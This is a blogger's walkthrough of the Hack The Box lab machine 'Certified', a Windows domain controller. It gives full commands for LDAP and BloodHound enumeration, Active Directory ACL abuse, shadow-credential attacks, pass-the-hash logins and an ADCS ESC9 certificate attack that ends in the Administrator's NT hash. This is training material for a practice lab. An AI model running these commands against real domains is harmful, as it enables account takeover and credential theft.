![[Hack The Box/Certified/IntroImage.png]] ## Summary of Exploitation Hey all, today I pwned Certified by HackTheBox. Certified was a medium machine that was incredibly well put together and the 4.8 rating shows. The attacker starts with low level user creds that allowed me to download all the ldap and bloodhound information. Using this information I was able to exploit some user misconfigurations that led me to a account that could write vulnerable ADCS tickets allowing me to write my own administrator certificate. ## Recon Phase As always, I start with my tried and true nmap scan `sudo nmap -sC -sV -p- --min-rate 10000 10.129.182.172 -oA nmap-out` ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 13:24 EST Nmap scan report for 10.129.182.172 Host is up (0.063s latency). Not shown: 65515 filtered tcp ports (no-response) PORT      STATE SERVICE       VERSION 53/tcp    open  domain        Simple DNS Plus 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 01:25:26Z) 135/tcp   open  msrpc         Microsoft Windows RPC 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-01-23T01:26:56+00:00; +7h00m02s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after:  2025-05-13T15:49:36 445/tcp   open  microsoft-ds? 464/tcp   open  kpasswd5? 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after:  2025-05-13T15:49:36 |_ssl-date: 2025-01-23T01:26:57+00:00; +7h00m02s from scanner time. 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after:  2025-05-13T15:49:36 |_ssl-date: 2025-01-23T01:26:56+00:00; +7h00m02s from scanner time. 3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after:  2025-05-13T15:49:36 |_ssl-date: 2025-01-23T01:26:57+00:00; +7h00m02s from scanner time. 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp  open  mc-nmf        .NET Message Framing 49666/tcp open  msrpc         Microsoft Windows RPC 49671/tcp open  msrpc         Microsoft Windows RPC 49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 49690/tcp open  msrpc         Microsoft Windows RPC 49695/tcp open  msrpc         Microsoft Windows RPC 49726/tcp open  msrpc         Microsoft Windows RPC 49747/tcp open  msrpc         Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time:   |   date: 2025-01-23T01:26:18 |_  start_date: N/A |_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s | smb2-security-mode:   |   3:1:1:   |_    Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 116.69 seconds ``` So it looks like we have a very standard Windows Domain Controller, no SQL, no webserver, nothing really too special. I will take note of the hostname DC01.certified.htb and add it to my `/etc/hosts` file. ![[etcHostsCert.png]] This machine was nice enough to provide me with starting shot credentials judith.mader / judith09, I'm going to leverage these credentials and download all the LDAP information I can to get a list of users and their associated groups using ldapdomaindump. `ldapdomaindump -u certified.htb\\judith.mader -p judith09 10.129.182.172 -o .` ![[ldapDomainDumpCert.png]] I'll open up the html file for users in my browser and get some situational awareness. ![[usersCert.png]] Not a whole lot of user's here. It looks like the only way I'm going to get a session is through management_svc. I'm going to add these users to my users.txt file. ![[usersTextCert.png]] Next, I'm going to further leverage Judith's creds by downloading all the bloodhound information using bloodhound-python. `bloodhound-python -c ALL -u judith.mader -p judith09 -d certified.htb -dc certified.htb -ns 10.129.182.172` ![[bloodCert.png]] I'll go ahead and fire-up bloodhound/neo4j and upload the information. ![[uploadBloodCert.png]] Now I'll do some digging and see if Judith has any special privilege's. ![[WriteOwnerCert.png]] Here we go! Judith has WriteOwner on the Management group. That group has GenericWrite on management_svc. Management_svc has GenericAll on ca_operator. It's likely ADCS will come into play here. I'll use netexec to confirm that suspicion. ``` nxc ldap 10.129.182.172 -u judith.mader -p 'judith09' -M adcs ``` ![[adcsCert.png]] Suspicion confirmed, I'll have to use ca_operator to search for vulnerable templates so I can potentially write a certificate for administrator. First I'm going to see if I can skip the line and kerberoast management_svc. Since bloodhound tells me that management_svc is kerberoastable. `impacket-GetUserSPNs -request -dc-ip 10.129.182.172 certified.htb/judith.mader -save -outputfile kerberoast-out` ![[Hack The Box/Certified/kerberoast.png]] `hashcat -m 13100 -a 0 kerberoast-out /usr/share/wordlists/rockyou.txt` but as expected, it doesn't crack. ![[noCracjCert.png]] ## Exploitation Phase First I'm going to give Judith write permissions and add her to the Management group using impacket tools. `impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.182.172` ![[ownerEditCert.png]] Now I'll give Judith the ability to write members to the group. `impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.182.172` ![[DaclModCert.png]] Finally I'll use RPC to add Judith to the Management Group. `net rpc group addmem "MANAGEMENT" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.182.172` I'll get nothing back, but no news is good news! Since I have GenericWrite on management_svc now I have two options. * I can do a direct Kerberoast on that account. Assuming I can even crack the hash (Which I can't). * We can abuse shadow credentials and get an NT hash using pywhisker assuming we have the Kerberos Ticket (which we do). We will use the bottom option. First I'll use pywhisker to check and see if management_svc has shadow credentials. First I'm going to use pywhisker in a python virtual environment. ``` python3 -m venv cert source venv/bin/activate ``` Now I can clone pywhisker and download the requirements. ``` git clone https://github.com/ShutdownRepo/pywhisker.git cd pywhisker pip3 install -r requirements.txt cd pywhisker ``` Now I can check to see if management_svc has shadow creds. `python3 pywhisker.py --action list -d certified.htb -u judith.mader -p judith09 --dc-ip 10.129.182.172 -t management_svc` ![[NoShadowCredsCert.png]] Not a problem, I can add some. `python3 pywhisker.py --action add -d certified.htb -u judith.mader -p judith09 --dc-ip 10.129.182.172 -t management_svc` ![[addpywhiskerCert.png]] I'm just going to do exactly what the command says and use PKINITtools to get the TGT. So I'll go ahead and clone it. ``` git clone https://github.com/dirkjanm/PKINITtools cd PKINITtools pip3 install -r requirements.txt ``` Now I'll run the command providing the information from the previous command. `python3 gettgtpkinit.py -cert-pfx ../9t2Ahj4Z.pfx -pfx-pass vy1ChB2p6Rfv1JxAbT6n certified.htb/management_svc management_svc.ccache -dc-ip 10.129.182.172` ![[KinitCert.png]] Now all that's left is to read it using getnthash.py. ``` export KRB5CCNAME=management_svc.ccache python3 getnthash.py certified.htb/management_svc -key 763a399ddfc5a617c3b785f46acb3eb7aac43f503b3f5bd7578b37ad615b4123 ``` After fighting a few times with clock skew, I got the hash! ![[hashCert.png]] We can log in and get the user hash. ``` evil-winrm -i 10.129.182.172 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584' *Evil-WinRM* PS C:\Users\management_svc>cat desktop/user.txt 1c153**************************** *Evil-WinRM* PS C:\Users\management_svc> ``` ## PrivEsc to Administrator Alright, now that I can successfully authenticate as management_svc, I need to pivot to ca_operator, since ADCS is active, and I have GenericAll over ca_operator, I can get its hash using certipy shadow. ``` certipy shadow auto -username [email protected] -hashes 'a091c1832bcdd4677c28b5a6a1295584' -account ca_operator ``` ![[gotCAopCert.png]] Easy day, We got the hash for ca_operator / b4b86f45c6018f1b664f70805f45d8f2 Now I'm going to check for any vulnerable templates using certipy. `certipy find -u ca_operator -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target certified.htb -text -stdout -vulnerable` ![[vulnerableTemplate.png]] Good news and bad new! We have a vulnerable template, but it's ESC9. ESC9 is just alittle more complicated is all. We can exploit it using this article [here](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7). First, I need to change ca_operators UPN to Administrator. `certipy account update -username [email protected] -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn Administrator` ![[upnToAdmin.png]] Now we need to request the vulnerable template as ca_operator. `certipy req -username [email protected] -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -ca certified-DC01-CA -template CertifiedAuthentication` ![[vulntemplatereqCert.png]] Now we can change the upn back. `certipy account update -username [email protected] -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn [email protected]` ![[ChangeitBackReq.png]] Last but not least, we can attempt to log in and steal the administrators NTLM hash. ``` certipy auth -pfx administrator.pfx -domain certified.htb ``` ![[boomAdminHashCert.png]] Now I can Evil-Winrm as administrator and get the root hash. `evil-winrm -i 10.129.182.172 -u administrator -H '0d5b49608bbce1751f708748f67e2d34'` ``` *Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt 98e66************************** ``` Thanks for reading everyone, I really enjoyed this machine. It was very straight forward and gave me a good opportunity to practice my remote ACL abuse. Happy Hacking!